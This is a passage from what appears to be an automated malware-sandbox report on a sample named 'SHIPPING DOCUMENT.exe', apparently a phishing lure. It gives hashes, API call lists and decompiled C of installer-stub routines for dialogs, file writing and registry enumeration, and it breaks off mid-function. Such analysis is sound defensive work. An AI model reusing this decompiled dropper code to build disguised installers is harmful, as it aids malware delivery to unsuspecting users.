                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-2458140235
                                            • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                            • Instruction ID: ed4a40943fe5e2665a2a55f9ea129fd4e03433fedea2fb13391fe05f183277a3
                                            • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                            • Instruction Fuzzy Hash: 5511E26180479139EB3216386C44B77BFD84B577A0F19007FE9C2722CAD67C5C62826D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404313, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404313(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                            0x00404325
                                            0x004043db
                                            0x00000000
                                            0x004043db
                                            0x00404336
                                            0x0040433a
                                            0x00000000
                                            0x00404354
                                            0x00404354
                                            0x0040435d
                                            0x00000000
                                            0x00000000
                                            0x0040435f
                                            0x0040436b
                                            0x0040436e
                                            0x0040436e
                                            0x00404374
                                            0x0040437a
                                            0x0040437a
                                            0x00404386
                                            0x0040438c
                                            0x00404393
                                            0x00404396
                                            0x00404399
                                            0x0040439b
                                            0x0040439b
                                            0x004043a3
                                            0x004043a9
                                            0x004043a9
                                            0x004043b3
                                            0x004043b8
                                            0x004043bb
                                            0x004043c0
                                            0x004043c3
                                            0x004043c3
                                            0x004043d3
                                            0x004043d3
                                            0x00000000
                                            0x004043d6

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                            • Instruction ID: 4ebf73092ad7484045a31fabae3cd442355fcbc25dfc518f848a7595e5b54366
                                            • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                            • Instruction Fuzzy Hash: 592165716007049BCB309F68E948B5BBBF8AF41710B05892EED96E26E0D774E814CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040534F, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040534F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423f24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424814;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062BB(0, _t39, 0x420530, 0x420530, _a4);
					}
					_t26 = lstrlenA(0x420530);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423f08, 0x420530);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x420530;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x420530)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x420530, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                            0x00405355
                                            0x00405361
                                            0x00405364
                                            0x0040536a
                                            0x00405376
                                            0x00405379
                                            0x0040537c
                                            0x00405382
                                            0x00405382
                                            0x00405388
                                            0x00405390
                                            0x00405393
                                            0x004053b0
                                            0x004053b4
                                            0x004053bd
                                            0x004053bd
                                            0x004053c7
                                            0x004053d0
                                            0x004053dc
                                            0x004053e3
                                            0x004053e7
                                            0x004053ea
                                            0x004053fd
                                            0x0040540b
                                            0x0040540b
                                            0x0040540f
                                            0x00405411
                                            0x00405414
                                            0x00000000
                                            0x00405414
                                            0x00405395
                                            0x0040539d
                                            0x004053a5
                                            0x004053ab
                                            0x00000000
                                            0x004053ab
                                            0x004053a5
                                            0x00405393
                                            0x0040541e

                                            APIs
                                            • lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                            • lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                            • lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                            • SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                            • Instruction ID: d7aab4fbb83e072b647ad5d9ecd44a72e262910ab30c50883f082c619406a612
                                            • Opcode Fuzzy Hash: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                            • Instruction Fuzzy Hash: 54218171900118BBDB11AF95DD84ADEBFB9EF04354F14807AF944B6291C7788E918F98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41f904; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41f904 = 0;
					return _t15;
				}
				__eflags =  *0x41f904; // 0x0
				if(__eflags != 0) {
					return E0040666D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x424750;
				if(_t6 >  *0x424750) {
					__eflags =  *0x424748;
					if( *0x424748 == 0) {
						_t7 = CreateDialogParamA( *0x424740, 0x6f, 0, E00402DBA, 0);
						 *0x41f904 = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424814 & 0x00000001;
					if(( *0x424814 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E0040534F(0,  &_v68);
					}
				}
				return _t6;
			}







                                            0x00402e5e
                                            0x00402e60
                                            0x00402e67
                                            0x00402e6a
                                            0x00402e6a
                                            0x00402e70
                                            0x00000000
                                            0x00402e70
                                            0x00402e78
                                            0x00402e7e
                                            0x00000000
                                            0x00402e81
                                            0x00402e88
                                            0x00402e8e
                                            0x00402e94
                                            0x00402e96
                                            0x00402e9c
                                            0x00402eda
                                            0x00402ee3
                                            0x00000000
                                            0x00402ee8
                                            0x00402e9e
                                            0x00402ea5
                                            0x00402eb6
                                            0x00000000
                                            0x00402ec4
                                            0x00402ea5
                                            0x00402ef0

                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402E6A
                                            • GetTickCount.KERNEL32 ref: 00402E88
                                            • wsprintfA.USER32 ref: 00402EB6
                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                              • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                              • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                            • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                              • Part of subcall function 00402E36: MulDiv.KERNEL32(00000000,00000064,00000D9F), ref: 00402E4B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 722711167-2449383134
                                            • Opcode ID: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                            • Instruction ID: 7a453c914e71352c87dd6fc4fa143b29ed4b83a6d55c3b122a6f25389f326a81
                                            • Opcode Fuzzy Hash: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                            • Instruction Fuzzy Hash: 22018470582214E7CB61AB64EF0DAAF766CEB41745B14403BF801F21E0C7B95846CAEE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404BFF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404BFF(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                            0x00404c0d
                                            0x00404c1a
                                            0x00404c20
                                            0x00404c5e
                                            0x00404c5e
                                            0x00404c6d
                                            0x00404c74
                                            0x00000000
                                            0x00404c76
                                            0x00404c22
                                            0x00404c31
                                            0x00404c39
                                            0x00404c3c
                                            0x00404c4e
                                            0x00404c54
                                            0x00404c5b
                                            0x00000000
                                            0x00404c5b
                                            0x00000000

                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C1A
                                            • GetMessagePos.USER32 ref: 00404C22
                                            • ScreenToClient.USER32 ref: 00404C3C
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C4E
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C74
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                            • Instruction ID: 8affecd5b479f1171f5654815cc51d63bffccf6ae5a63c5c4c29235a80b14989
                                            • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                            • Instruction Fuzzy Hash: 34015E71900219BBEB00DBA4DD85FFFBBBCAF55711F10012BBA50B61D0D7B4A9418BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x424754 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                            0x00402dc7
                                            0x00402dd5
                                            0x00402ddb
                                            0x00402ddb
                                            0x00402de9
                                            0x00402deb
                                            0x00402df7
                                            0x00402dfc
                                            0x00402dfe
                                            0x00402dfe
                                            0x00402e09
                                            0x00402e19
                                            0x00402e2b
                                            0x00402e2b
                                            0x00402e33

                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                            • wsprintfA.USER32 ref: 00402E09
                                            • SetWindowTextA.USER32(?,?), ref: 00402E19
                                            • SetDlgItemTextA.USER32 ref: 00402E2B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                            • API String ID: 1451636040-1158693248
                                            • Opcode ID: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                            • Instruction ID: 5924424b8475f9adf48b5715c1e1f77af8692632bd00ddb5f136e7bd4fbbb8aa
                                            • Opcode Fuzzy Hash: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                            • Instruction Fuzzy Hash: 36F01D7154020DFBEF20AF60DE0ABAE3769EB54345F00803AFA16B51D0DBB899558B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C2D(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405D9C(_t50);
				_t26 = E00405DC1(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x424758;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403419(_t45);
						E00403403(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E00403192(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405D7C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E68( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00403192(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                            0x004027df
                                            0x004027e1
                                            0x004027ed
                                            0x004027f0
                                            0x004027fa
                                            0x004027fe
                                            0x004027fe
                                            0x00402804
                                            0x00402811
                                            0x00402819
                                            0x0040281c
                                            0x00402822
                                            0x00402830
                                            0x00402835
                                            0x00402839
                                            0x0040283c
                                            0x00402845
                                            0x00402851
                                            0x00402855
                                            0x00402858
                                            0x00402862
                                            0x00402887
                                            0x00402869
                                            0x0040286e
                                            0x00402876
                                            0x0040287c
                                            0x00402881
                                            0x00402881
                                            0x0040288e
                                            0x0040288e
                                            0x0040289b
                                            0x004028a1
                                            0x004028b3
                                            0x004028b3
                                            0x004028b9
                                            0x004028b9
                                            0x004028c4
                                            0x004028c5
                                            0x004028c9
                                            0x004028cd
                                            0x004028d3
                                            0x004028d3
                                            0x004028da
                                            0x004022dd
                                            0x00402a5d
                                            0x00402a69

                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                            • GlobalFree.KERNEL32 ref: 0040288E
                                            • GlobalFree.KERNEL32 ref: 004028A1
                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                            • Instruction ID: d0efecf462ec4b8749248d5ce184abccdfd1d8ac98bc27b14fb78a8abc9ee6f4
                                            • Opcode Fuzzy Hash: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                            • Instruction Fuzzy Hash: A5217C72800128BBDB216FA5CE48D9E7E79EF09364F10823EF461762E1C67949418BA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404AF5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00404AF5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062BB(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062BB(_t41, _t47, 0x420d50, 0x420d50, _a8);
				wsprintfA(_t32 + lstrlenA(0x420d50), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423f18, _a4, 0x420d50);
			}



















                                            0x00404afb
                                            0x00404b00
                                            0x00404b08
                                            0x00404b09
                                            0x00404b16
                                            0x00404b1e
                                            0x00404b1f
                                            0x00404b21
                                            0x00404b23
                                            0x00404b25
                                            0x00404b28
                                            0x00404b28
                                            0x00404b2f
                                            0x00404b35
                                            0x00404b35
                                            0x00404b3c
                                            0x00404b43
                                            0x00404b46
                                            0x00404b49
                                            0x00404b49
                                            0x00404b4d
                                            0x00404b5d
                                            0x00404b5f
                                            0x00404b62
                                            0x00404b0b
                                            0x00404b0b
                                            0x00404b12
                                            0x00404b12
                                            0x00404b6a
                                            0x00404b75
                                            0x00404b8b
                                            0x00404b9b
                                            0x00404bb7

                                            APIs
                                            • lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                            • wsprintfA.USER32 ref: 00404B9B
                                            • SetDlgItemTextA.USER32 ref: 00404BAE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s$PB
                                            • API String ID: 3540041739-838025833
                                            • Opcode ID: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                            • Instruction ID: 5179c0f035392565bdab74c0efbe7b8420b5ea1509705373073e4f645d5961bf
                                            • Opcode Fuzzy Hash: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                            • Instruction Fuzzy Hash: 6011B773A0412437DB10656D9C45FAE329CDB85374F25023BFA26F31D1E978DC1282E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 48%
                                            			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060AE(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
